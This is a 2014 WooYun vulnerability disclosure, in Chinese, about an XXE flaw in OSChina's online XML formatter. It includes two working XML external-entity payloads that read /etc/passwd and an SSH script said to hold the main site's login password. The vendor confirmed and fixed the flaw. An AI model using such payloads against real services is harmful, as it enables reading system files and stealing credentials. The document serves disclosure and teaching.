漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-059911
漏洞标题:从开源中国的某XXE漏洞到主站shell
相关厂商:开源中国
漏洞作者: 五道口杀气
提交时间:2014-05-08 14:58
修复时间:2014-06-22 14:59
公开时间:2014-06-22 14:59
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-08: 细节已通知厂商并且等待厂商处理中
2014-05-08: 厂商已经确认,细节仅向厂商公开
2014-05-18: 细节向核心白帽子及相关领域专家公开
2014-05-28: 细节向普通白帽子公开
2014-06-07: 细节向实习白帽子公开
2014-06-22: 细节向公众公开
简要描述:
无意间发现的一个XXE,最终可得到主站shell
详细说明:
http://tool.oschina.net/codeformat/xml
格式化xml,白捡了一个漏洞,输入代码:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><name>&xxe;</name></root>
直接读取/etc/passwd文件内容。
读到/home/run/ssh_go.sh
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "file:///home/run/ssh_go.sh">]>
<root><name>&xxe;</name></root>
发现主站登陆ssh的一个用户密码。
漏洞证明:
修复方案:
版权声明:转载请注明来源 五道口杀气@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-05-08 15:36
厂商回复:
非常可怕的漏洞,已处理
最新状态:
暂无
漏洞评价:
评论
-
我闻到了一股杀气...
-
@蟋蟀哥哥 红薯菊花没了
-
果断mark 杀气系列
-
xxe漏洞绝佳案例啊
( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)